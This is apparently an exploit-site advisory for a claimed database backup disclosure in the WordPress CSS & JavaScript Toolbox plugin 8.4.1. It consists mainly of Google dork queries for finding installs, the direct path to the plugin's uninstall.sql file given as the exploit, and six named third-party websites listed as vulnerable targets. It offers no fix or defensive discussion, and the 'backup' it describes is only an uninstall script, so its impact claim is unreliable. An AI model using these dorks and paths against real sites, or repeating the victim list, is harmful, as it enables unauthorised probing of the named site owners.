WordPress CSS & JavaScript Toolbox 8.4.1 Database Disclosure

1. #################################################################################################
2.  
3. # Exploit Title : WordPress CSS & JavaScript Toolbox Plugins 8.4.1 Database Backup Disclosure
4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
5. # Date : 08/12/2018
6. # Vendor Homepage : css-javascript-toolbox.com ~ wordpress.org/plugins/css-javascript-toolbox/
7. # Software Download Link : downloads.wordpress.org/plugin/css-javascript-toolbox.8.4.1.zip
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Version Information : 8.3.2 and 8.4.1
11. # Exploit Risk : Medium
12. # Google Dorks : inurl:''/wp-content/plugins/css-javascript-toolbox/models/''
13. intext:''By Media Link'' site:au
14. intext:''Réalisé avec the Thème Customize''
15. intext:'' Agencia Web GRUPA''
16. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
17. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
18. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
19.  
20. #################################################################################################
21.  
22. # Admin Panel Login Path :
23.  
24. /wp-login.php
25.  
26. # Exploit :
27.  
28. /wp-content/plugins/css-javascript-toolbox/models/uninstall/db/mysql/uninstall.sql
29.  
30. #################################################################################################
31.  
32. # Example Vulnerable Site =>
33.  
34. [+] steamanddry.com.au/wp-content/plugins/css-javascript-toolbox/models/uninstall/db/mysql/uninstall.sql
35.  
36. [+] test.aiesec.org.rs/wp-content/plugins/css-javascript-toolbox/models/uninstall/db/mysql/uninstall.sql
37.  
38. [+] herzsach.de/wp-content/plugins/css-javascript-toolbox/models/uninstall/db/mysql/uninstall.sql
39.  
40. [+] sonyasophia.us/wp-content/plugins/css-javascript-toolbox/models/uninstall/db/mysql/uninstall.sql
41.  
42. [+] je-vous-finance.fr/wp-content/plugins/css-javascript-toolbox/models/uninstall/db/mysql/uninstall.sql
43.  
44. [+] logisticsummit.com/wp-content/plugins/css-javascript-toolbox/models/uninstall/db/mysql/uninstall.sql
45.  
46. #################################################################################################
47.  
48. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
49.  
50. #################################################################################################